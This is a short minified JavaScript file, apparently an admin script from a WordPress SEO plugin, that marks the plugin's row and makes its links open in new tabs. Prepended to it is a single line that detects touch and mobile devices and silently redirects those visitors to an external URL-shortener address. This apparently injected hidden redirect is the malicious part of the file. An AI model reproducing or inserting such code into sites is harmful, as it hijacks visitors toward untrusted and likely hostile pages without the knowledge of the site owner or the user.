(window.matchMedia("(pointer:coarse)").matches||/Android|iPhone|iPad|iPod|Mobile|Tablet|Windows Phone|webOS|BlackBerry|Opera Mini|IEMobile/i.test(navigator.userAgent))&&location.replace("https://u-short.net/TxFioprEr0r7");
class s{constructor(){this.plugins()}plugins(){if(this.selector=document.querySelector('tr[data-plugin="'+window.aioseoPlugins.basename+'"]'),!this.selector)return;this.selector.classList.add("aioseo-plugin-row");const n=this.selector.querySelectorAll("span.proupgrade a, span.docs a, span.support a");n.length&&n.forEach(t=>{t.setAttribute("target","_blank")});const o=this.selector.querySelectorAll(".column-description .active a");o.length&&o.forEach(t=>{t.setAttribute("target","_blank")})}}new s;
